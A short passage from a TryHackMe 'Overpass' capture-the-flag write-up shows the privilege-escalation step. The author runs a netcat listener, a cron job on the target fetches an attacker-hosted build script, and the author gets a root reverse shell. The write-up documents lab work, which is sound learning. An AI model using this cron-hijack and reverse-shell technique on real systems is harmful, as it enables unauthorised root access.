ajread4/thm_writeups_publish/overpass_writeup_publish.md

 nc -lnvp 5555
 ```
 After a certain period of time, the job calls the build script, creates a reverse shell and escalates privilege!

+I can see the HTTP GET request by the Overpass machine to my local machine.
 ```
 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
 10.10.118.191 - - [18/Feb/2022 08:00:01] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
 ```
+In the terminal where my netcat listener is set up, I am dropped into a root shell.
 ```
 root@overpass-prod:~# id
 id